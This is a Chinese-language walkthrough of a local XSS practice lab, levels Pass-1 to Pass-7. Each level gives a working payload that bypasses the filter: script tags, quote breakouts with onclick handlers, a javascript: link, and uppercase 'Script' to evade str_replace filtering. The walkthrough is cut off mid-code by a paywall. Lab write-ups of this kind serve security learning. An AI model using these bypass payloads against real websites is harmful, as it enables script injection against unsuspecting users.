- Pass-1
127.0.0.1/xss/level1.php?name=<script>alert(1)</script>

通过
- Pass-2
直接插入不行,引号将其包裹起了

http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><--

- Pass-3
审查元素看看

看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都被校验了
可以集合单引号和事件来触发
‘ onclick='alert(1)

- Pass-4

可以看到对< >进行了过滤
由下图可以看出是双引号包裹得

" οnclick="alert(1)"

- Pass-5

对script进行了过滤
看了下还是双引号包裹

过滤了
" οnclick="alert(1)"

看手源码

"><a href='javascript:alert(1)'>

- Pass-6
过滤
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
可大小写绕过
"><Script>alert(1)</script>

- Pass-7
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4

本文详细介绍了在XSS靶场中从Pass-1到Pass-16的各种过滤和绕过策略,包括利用单引号、事件触发、大小写绕过、cookie注入以及ng-include等方法进行攻击。通过审查元素和理解代码过滤机制,逐步揭示了如何在不同层级的防护下成功触发XSS漏洞。
最低0.47元/天 解锁文章
1462

被折叠的 条评论
为什么被折叠?



